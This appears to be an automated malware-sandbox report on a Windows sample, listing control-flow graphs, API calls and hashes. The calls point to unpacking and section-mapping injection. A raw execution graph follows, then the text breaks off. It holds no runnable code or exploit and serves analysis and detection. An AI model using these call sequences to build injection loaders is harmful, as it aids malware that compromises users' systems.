                                                        control_flow_graph 0 55003c-550047 1 55004c-550263 call 550a3f call 550e0f call 550d90 VirtualAlloc 0->1 2 550049 0->2 17 550265-550289 call 550a69 1->17 18 55028b-550292 1->18 2->1 22 5502ce-5503c2 VirtualProtect call 550cce call 550ce7 17->22 19 5502a1-5502b0 18->19 21 5502b2-5502cc 19->21 19->22 21->19 29 5503d1-5503e0 22->29 30 5503e2-550437 call 550ce7 29->30 31 550439-5504b8 VirtualFree 29->31 30->29 33 5505f4-5505fe 31->33 34 5504be-5504cd 31->34 36 550604-55060d 33->36 37 55077f-550789 33->37 35 5504d3-5504dd 34->35 35->33 39 5504e3-550505 35->39 36->37 42 550613-550637 36->42 40 5507a6-5507b0 37->40 41 55078b-5507a3 37->41 51 550517-550520 39->51 52 550507-550515 39->52 44 5507b6-5507cb 40->44 45 55086e-5508be LoadLibraryA 40->45 41->40 46 55063e-550648 42->46 48 5507d2-5507d5 44->48 50 5508c7-5508f9 45->50 46->37 49 55064e-55065a 46->49 53 550824-550833 48->53 54 5507d7-5507e0 48->54 49->37 55 550660-55066a 49->55 56 550902-55091d 50->56 57 5508fb-550901 50->57 58 550526-550547 51->58 52->58 62 550839-55083c 53->62 59 5507e4-550822 54->59 60 5507e2 54->60 61 55067a-550689 55->61 57->56 63 55054d-550550 58->63 59->48 60->53 64 550750-55077a 61->64 65 55068f-5506b2 61->65 62->45 66 55083e-550847 62->66 68 550556-55056b 63->68 69 5505e0-5505ef 63->69 64->46 70 5506b4-5506ed 65->70 71 5506ef-5506fc 65->71 72 550849 66->72 73 55084b-55086c 66->73 74 55056d 68->74 75 55056f-55057a 68->75 69->35 70->71 76 5506fe-550748 71->76 77 55074b 71->77 72->45 73->62 74->69 79 55057c-550599 75->79 80 55059b-5505bb 75->80 76->77 77->61 84 5505bd-5505db 79->84 80->84 84->63
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0055024D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_550000_dvjdfvr.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: cess$kernel32.dll
                                                        • API String ID: 4275171209-1230238691
                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction ID: 45bb27c3125b16f6db0b06f06b814a4eb305919380205288ee8db3488fa42a7c
                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction Fuzzy Hash: 39526C74A00229DFDB64CF58C995BA8BBB1BF09305F1480DAE94DA7351DB30AE89DF14

                                                        Control-flow Graph

                                                         control_flow_graph: rendered graph of the function at 005319D7 (basic blocks 5319d7-531a35, colour-coded Executed / Not Executed; node and edge list omitted). API nodes: CreateToolhelp32Snapshot, Module32First. Internal call: 531696.
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005319FF
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00531A1F
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090450815.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_520000_dvjdfvr.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: 0a18dc108f91c45d530b43be9e28cb3a195ea6a2cd38313b1d272b70ba000deb
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: 3DF09632101B117BD7203BF59C8DB6E7BE8BF49726F140628E643954C0DB70EC4546A5

                                                        Control-flow Graph

                                                         control_flow_graph: rendered graph of the function at 00550E0F (basic blocks 550e0f-550e2c, colour-coded Executed / Not Executed; node and edge list omitted). API nodes: SetErrorMode (called twice).
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00550223,?,?), ref: 00550E19
                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00550223,?,?), ref: 00550E1E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_550000_dvjdfvr.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction ID: 59f4f3660f24c022e483895a9ce12252ed7c3a0652483bba4d3b890b59234470
                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction Fuzzy Hash: 8AD0123114512877D7002AD4DC09BCD7F1CDF05B63F108411FB0DD9080C770994046E5

                                                        Control-flow Graph

                                                         control_flow_graph: rendered graph of the function at 00401919 (basic blocks 401919-401a25, colour-coded Executed / Not Executed; node and edge list omitted). API nodes: Sleep. Internal calls: 401207, 401482, 401583.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                        • Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
                                                        • Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                        • Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F

                                                        Control-flow Graph

                                                         control_flow_graph: rendered graph of the function at 00401959 (basic blocks 401959-401a25, colour-coded Executed / Not Executed; node and edge list omitted). API nodes: Sleep. Internal calls: 401207, 401482, 401583.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                        • Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
                                                        • Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                        • Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF

                                                        Control-flow Graph

                                                         control_flow_graph: rendered graph of the function at 00401970 (basic blocks 401970-401a25, colour-coded Executed / Not Executed; node and edge list omitted). API nodes: Sleep. Internal calls: 401207, 401482, 401583.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                        • Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
                                                        • Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                        • Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B

                                                        Control-flow Graph

                                                         control_flow_graph: rendered graph of the function at 00401977 (basic blocks 401977-401a25, colour-coded Executed / Not Executed; node and edge list omitted). API nodes: Sleep. Internal calls: 401207, 401482, 401583.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                        • Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
                                                        • Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                        • Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B

                                                        Control-flow Graph

                                                         control_flow_graph: rendered graph of the function at 00401987 (basic blocks 401987-401a25, colour-coded Executed / Not Executed; node and edge list omitted). API nodes: Sleep. Internal calls: 401207, 401482, 401583.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                        • Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
                                                        • Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                        • Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B

                                                        Control-flow Graph

                                                         control_flow_graph: rendered graph of the function at 0040198A (basic blocks 40198a-401a25, colour-coded Executed / Not Executed; node and edge list omitted). API nodes: Sleep. Internal calls: 401207, 401482, 401583.
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                        • Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
                                                        • Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                        • Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B

                                                        Control-flow Graph

                                                         control_flow_graph: rendered graph of the function at 00531696 (basic blocks 531696-53171e, colour-coded Executed / Not Executed; node and edge list omitted). API nodes: VirtualAlloc. Internal calls: 5319a9, 531723.
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005316E7
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090450815.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_520000_dvjdfvr.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: 60f54c2b6c70baf80981567106971bff7766605a00caad6439414e639d251a47
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: 8E112D79A00208EFDB01DF98C985E98BFF5EF08350F058094F9489B362D771EA50DB84

                                                        Execution Graph

                                                        Execution Coverage:0.2%
                                                        Dynamic/Decrypted Code Coverage:16.3%
                                                        Signature Coverage:4.2%
                                                        Total number of Nodes:1745
                                                        Total number of Limit Nodes:0
                                                         execution_graph: rendered execution graph of the 00400000 image (node and edge list omitted; the dump is truncated here). API nodes visible in the graph: TlsAlloc, TlsGetValue, TlsSetValue, SetUnhandledExceptionFilter, UnhandledExceptionFilter, HeapCreate, HeapAlloc, HeapFree, GetModuleHandleW, GetProcAddress, GetCurrentThreadId, GetStartupInfoA, GetStdHandle, SetHandleCount, GetFileType, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, InterlockedIncrement, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, GetModuleFileNameA, GetCurrentDirectoryA, WriteFile, GetLastError, SetLastError, Sleep. The remaining nodes are MSVC CRT start-up and error-handling helpers (among them __calloc_impl, __getptd, __encode_pointer, __decode_pointer, __NMSG_WRITE, __amsg_exit, __lock, __invoke_watson, __initptd, __RTC_Initialize, __initterm, __wwincmdln, _doexit, _abort, _malloc, _memset, _wcslen, _strlen, _strcpy_s, _strcat_s).
4048fa 6423->6424 6424->6391 6426 404c88 HeapReAlloc 6425->6426 6427 404cbc HeapAlloc 6425->6427 6428 404ca6 6426->6428 6429 404caa 6426->6429 6427->6428 6430 404cdf VirtualAlloc 6427->6430 6428->6380 6429->6427 6430->6428 6431 404cf9 HeapFree 6430->6431 6431->6428 6433 404d3c VirtualAlloc 6432->6433 6435 404d83 6433->6435 6435->6376 6436->6383 6438 405617 Sleep GetModuleHandleW 6437->6438 6439 405635 6438->6439 6440 405639 6438->6440 6439->6438 6439->6440 6440->6317 6440->6323 6441->6326 6460 404822 LeaveCriticalSection 6442->6460 6444 407cd2 6444->6336 6446 40a7b8 InterlockedIncrement 6445->6446 6447 40a7bb 6445->6447 6446->6447 6448 40a7c5 InterlockedIncrement 6447->6448 6449 40a7c8 6447->6449 6448->6449 6450 40a7d2 InterlockedIncrement 6449->6450 6451 40a7d5 6449->6451 6450->6451 6452 40a7df InterlockedIncrement 6451->6452 6453 40a7e2 6451->6453 6452->6453 6454 40a7fb InterlockedIncrement 6453->6454 6455 40a80b InterlockedIncrement 6453->6455 6456 40a816 InterlockedIncrement 6453->6456 6454->6453 6455->6453 6456->6339 6461 404822 LeaveCriticalSection 6457->6461 6459 407d20 6459->6341 6460->6444 6461->6459 6463 404c40 6462->6463 6464 40499e 6462->6464 6463->6351 6464->6463 6465 404b8a VirtualFree 6464->6465 6466 404bee 6465->6466 6466->6463 6467 404bfd VirtualFree HeapFree 6466->6467 6472 4091d0 6467->6472 6476 404822 LeaveCriticalSection 6469->6476 6471 4072d2 6471->6344 6473 4091e8 6472->6473 6474 409217 6473->6474 6475 40920f __VEC_memcpy 6473->6475 6474->6463 6475->6474 6476->6471 6478 409ed3 6477->6478 6479 409ecc 6477->6479 6480 405b6a __calloc_impl 67 API calls 6478->6480 6479->6478 6481 409ef9 6479->6481 6485 409ed8 6480->6485 6483 4059bf 6481->6483 6484 405b6a __calloc_impl 67 API calls 6481->6484 6482 406ee2 __calloc_impl 6 API calls 6482->6483 6483->6253 6486 406dba 6483->6486 6484->6485 6485->6482 6538 40b110 6486->6538 6488 406de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6489 406ec3 GetCurrentProcess TerminateProcess 
6488->6489 6490 406eb7 __invoke_watson 6488->6490 6540 40841c 6489->6540 6490->6489 6492 4059d0 6492->6253 6498 409d84 6493->6498 6494 409d88 6495 405a44 6494->6495 6496 405b6a __calloc_impl 67 API calls 6494->6496 6495->6269 6495->6271 6497 409da4 6496->6497 6499 406ee2 __calloc_impl 6 API calls 6497->6499 6498->6494 6498->6495 6500 409dce 6498->6500 6499->6495 6500->6495 6501 405b6a __calloc_impl 67 API calls 6500->6501 6501->6497 6505 409d16 6502->6505 6506 409d0f 6502->6506 6503 405b6a __calloc_impl 67 API calls 6504 409d1b 6503->6504 6507 406ee2 __calloc_impl 6 API calls 6504->6507 6505->6503 6506->6505 6508 409d4a 6506->6508 6509 405a6a 6507->6509 6508->6509 6510 405b6a __calloc_impl 67 API calls 6508->6510 6509->6264 6509->6266 6510->6504 6549 407b46 6511->6549 6514 409bb8 LoadLibraryA 6515 409ce2 6514->6515 6516 409bcd GetProcAddress 6514->6516 6515->6274 6516->6515 6519 409be3 6516->6519 6517 409c6a 6520 407b4f __decode_pointer 6 API calls 6517->6520 6537 409c95 6517->6537 6518 409c40 6518->6517 6521 407b4f __decode_pointer 6 API calls 6518->6521 6552 407ad4 TlsGetValue 6519->6552 6531 409cad 6520->6531 6524 409c5d 6521->6524 6523 407b4f __decode_pointer 6 API calls 6523->6515 6526 407b4f __decode_pointer 6 API calls 6524->6526 6526->6517 6527 407ad4 __encode_pointer 6 API calls 6528 409bfe GetProcAddress 6527->6528 6529 407ad4 __encode_pointer 6 API calls 6528->6529 6530 409c13 GetProcAddress 6529->6530 6532 407ad4 __encode_pointer 6 API calls 6530->6532 6533 407b4f __decode_pointer 6 API calls 6531->6533 6531->6537 6534 409c28 6532->6534 6533->6537 6534->6518 6535 409c32 GetProcAddress 6534->6535 6536 407ad4 __encode_pointer 6 API calls 6535->6536 6536->6518 6537->6523 6539 40b11c __VEC_memzero 6538->6539 6539->6488 6541 408424 6540->6541 6542 408426 IsDebuggerPresent 6540->6542 6541->6492 6548 40b105 6542->6548 6545 40b44a SetUnhandledExceptionFilter UnhandledExceptionFilter 6546 40b467 __invoke_watson 6545->6546 6547 40b46f GetCurrentProcess 
TerminateProcess 6545->6547 6546->6547 6547->6492 6548->6545 6550 407ad4 __encode_pointer 6 API calls 6549->6550 6551 407b4d 6550->6551 6551->6514 6551->6518 6553 407aec 6552->6553 6554 407b0d GetModuleHandleW 6552->6554 6553->6554 6557 407af6 TlsGetValue 6553->6557 6555 407b28 GetProcAddress 6554->6555 6556 407b1d 6554->6556 6561 407b05 GetProcAddress 6555->6561 6558 40560c __crt_waiting_on_module_handle 2 API calls 6556->6558 6560 407b01 6557->6560 6559 407b23 6558->6559 6559->6555 6559->6561 6560->6554 6560->6561 6561->6527 6563 405679 GetProcAddress 6562->6563 6564 405689 ExitProcess 6562->6564 6563->6564 6566 407b46 __init_pointers 6 API calls 6565->6566 6567 4058fe __init_pointers __initp_misc_winsig 6566->6567 6582 409954 6567->6582 6570 407ad4 __encode_pointer 6 API calls 6571 40593a 6570->6571 6571->6151 6573 40478b 6572->6573 6574 409087 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6573->6574 6575 4047b9 6573->6575 6574->6573 6575->6141 6575->6161 6577 407c08 6576->6577 6578 407c14 6576->6578 6581 407b4f __decode_pointer 6 API calls 6577->6581 6579 407c36 6578->6579 6580 407c28 TlsFree 6578->6580 6579->6579 6580->6579 6581->6578 6583 407ad4 __encode_pointer 6 API calls 6582->6583 6584 405930 6583->6584 6584->6570 6585->6172 6587 40b305 6586->6587 6588 40b30c 6586->6588 6587->6588 6592 40b338 6587->6592 6589 405b6a __calloc_impl 67 API calls 6588->6589 6590 40b311 6589->6590 6591 406ee2 __calloc_impl 6 API calls 6590->6591 6593 40b320 6591->6593 6592->6593 6594 405b6a __calloc_impl 67 API calls 6592->6594 6593->6206 6594->6590 6596 408fcb 6595->6596 6597 407ad4 __encode_pointer 6 API calls 6596->6597 6598 408fe3 6596->6598 6597->6596 6598->6217 6602 4098c8 6599->6602 6601 409911 6601->6219 6603 4098d4 __calloc_impl 6602->6603 6610 4056a8 6603->6610 6609 4098f5 __calloc_impl 6609->6601 6611 4048fc __lock 67 API calls 6610->6611 6612 4056af 6611->6612 6613 4097dd 6612->6613 6614 407b4f __decode_pointer 6 API calls 6613->6614 6615 4097f1 6614->6615 
6616 407b4f __decode_pointer 6 API calls 6615->6616 6617 409801 6616->6617 6618 409884 6617->6618 6633 40bdab 6617->6633 6630 4098fe 6618->6630 6620 407ad4 __encode_pointer 6 API calls 6621 409879 6620->6621 6624 407ad4 __encode_pointer 6 API calls 6621->6624 6622 409843 6622->6618 6626 409178 __realloc_crt 73 API calls 6622->6626 6627 409859 6622->6627 6623 40981f 6623->6622 6629 40986b 6623->6629 6646 409178 6623->6646 6624->6618 6626->6627 6627->6618 6628 407ad4 __encode_pointer 6 API calls 6627->6628 6628->6629 6629->6620 6724 4056b1 6630->6724 6634 40bdb7 __calloc_impl 6633->6634 6635 40bde4 6634->6635 6636 40bdc7 6634->6636 6637 40be25 HeapSize 6635->6637 6639 4048fc __lock 67 API calls 6635->6639 6638 405b6a __calloc_impl 67 API calls 6636->6638 6642 40bddc __calloc_impl 6637->6642 6640 40bdcc 6638->6640 6643 40bdf4 ___sbh_find_block 6639->6643 6641 406ee2 __calloc_impl 6 API calls 6640->6641 6641->6642 6642->6623 6651 40be45 6643->6651 6650 409181 6646->6650 6648 4091c0 6648->6622 6649 4091a1 Sleep 6649->6650 6650->6648 6650->6649 6655 403657 6650->6655 6654 404822 LeaveCriticalSection 6651->6654 6653 40be20 6653->6637 6653->6642 6654->6653 6656 403663 __calloc_impl 6655->6656 6657 403678 6656->6657 6658 40366a 6656->6658 6660 40368b 6657->6660 6661 40367f 6657->6661 6691 403395 6658->6691 6669 4037fd 6660->6669 6689 403698 ___sbh_resize_block _realloc ___sbh_find_block 6660->6689 6662 407275 ___convertcp 67 API calls 6661->6662 6663 403672 __dosmaperr __calloc_impl 6662->6663 6663->6650 6664 403830 6665 405bc2 __calloc_impl 6 API calls 6664->6665 6668 403836 6665->6668 6666 4048fc __lock 67 API calls 6666->6689 6667 403802 HeapReAlloc 6667->6663 6667->6669 6670 405b6a __calloc_impl 67 API calls 6668->6670 6669->6664 6669->6667 6671 403854 6669->6671 6672 405bc2 __calloc_impl 6 API calls 6669->6672 6674 40384a 6669->6674 6670->6663 6671->6663 6673 405b6a __calloc_impl 67 API calls 6671->6673 6672->6669 6675 40385d GetLastError 6673->6675 6677 405b6a 
__calloc_impl 67 API calls 6674->6677 6675->6663 6679 4037cb 6677->6679 6678 403723 HeapAlloc 6678->6689 6679->6663 6681 4037d0 GetLastError 6679->6681 6680 403778 HeapReAlloc 6680->6689 6681->6663 6682 40510e ___sbh_alloc_block 5 API calls 6682->6689 6683 4037e3 6683->6663 6685 405b6a __calloc_impl 67 API calls 6683->6685 6684 405bc2 __calloc_impl 6 API calls 6684->6689 6687 4037f0 6685->6687 6686 4037c6 6688 405b6a __calloc_impl 67 API calls 6686->6688 6687->6663 6687->6675 6688->6679 6689->6663 6689->6664 6689->6666 6689->6678 6689->6680 6689->6682 6689->6683 6689->6684 6689->6686 6690 40495f VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 6689->6690 6708 40379b 6689->6708 6690->6689 6692 403448 6691->6692 6697 4033a7 6691->6697 6693 405bc2 __calloc_impl 6 API calls 6692->6693 6694 40344e 6693->6694 6696 405b6a __calloc_impl 66 API calls 6694->6696 6695 405aef __FF_MSGBANNER 66 API calls 6695->6697 6702 403440 6696->6702 6697->6695 6699 405944 __NMSG_WRITE 66 API calls 6697->6699 6700 403404 HeapAlloc 6697->6700 6701 405690 _malloc 3 API calls 6697->6701 6697->6702 6703 403434 6697->6703 6705 405bc2 __calloc_impl 6 API calls 6697->6705 6706 403439 6697->6706 6711 403346 6697->6711 6699->6697 6700->6697 6701->6697 6702->6663 6704 405b6a __calloc_impl 66 API calls 6703->6704 6704->6706 6705->6697 6707 405b6a __calloc_impl 66 API calls 6706->6707 6707->6702 6723 404822 LeaveCriticalSection 6708->6723 6710 4037a2 6710->6689 6712 403352 __calloc_impl 6711->6712 6713 403383 __calloc_impl 6712->6713 6714 4048fc __lock 67 API calls 6712->6714 6713->6697 6715 403368 6714->6715 6716 40510e ___sbh_alloc_block 5 API calls 6715->6716 6717 403373 6716->6717 6719 40338c 6717->6719 6722 404822 LeaveCriticalSection 6719->6722 6721 403393 6721->6713 6722->6721 6723->6710 6727 404822 LeaveCriticalSection 6724->6727 6726 4056b8 6726->6609 6727->6726 6729 402af6 SetLastError 6728->6729 6730 402b01 6729->6730 6731 402b0a 6729->6731 6730->6729 6730->6731 6732 402b16 
DefineDosDeviceW 6731->6732 6742 402b35 6731->6742 6735 403395 _malloc 67 API calls 6732->6735 6733 402bba VirtualAlloc 6737 402bf4 GetTickCount 6733->6737 6734 402b5c OpenJobObjectW InterlockedIncrement 6763 403558 6734->6763 6736 402b2b 6735->6736 6739 403657 _realloc 72 API calls 6736->6739 6737->6737 6740 402bfb 6737->6740 6739->6742 6743 402c59 6740->6743 6746 402c32 InterlockedExchange LoadLibraryA ReadConsoleInputA 6740->6746 6742->6733 6742->6734 6747 402c77 LCMapStringW InterlockedExchange OpenEventW 6743->6747 6748 402ca7 6743->6748 6745 402b8a 6770 403194 6745->6770 6746->6740 6747->6743 6792 4029b0 6748->6792 6751 402cac 6754 402cc8 GetCurrentProcess GetCharWidth32A 6751->6754 6756 402ce5 6751->6756 6752 402ba0 6777 403592 6752->6777 6754->6751 6755 402bb7 6755->6733 6757 402cf0 GetLastError 6756->6757 6758 402d17 6756->6758 6757->6756 6759 402d3c GetFileAttributesA GetShortPathNameA GlobalCompact GetEnvironmentStrings SetComputerNameW 6758->6759 6760 402d71 InterlockedExchange 6758->6760 6761 402d83 LoadLibraryA 6758->6761 6759->6758 6760->6758 6762 402de6 6761->6762 6762->6223 6797 405ea0 6763->6797 6766 403587 6767 40356e 6766->6767 7103 405ecb 6767->7103 6771 4031ac __ctrlfp 6770->6771 6772 4031dc 6771->6772 6775 40320a __set_exp __copysign __decomp 6771->6775 6776 4031f4 __set_exp __ctrlfp 6771->6776 7106 4044af 6772->7106 6775->6776 7113 404510 6775->7113 6776->6752 6778 40359e __calloc_impl 6777->6778 6779 4035c9 __stbuf 6778->6779 6780 4035ac 6778->6780 7146 406000 6779->7146 6781 405b6a __calloc_impl 67 API calls 6780->6781 6782 4035b1 6781->6782 6784 406ee2 __calloc_impl 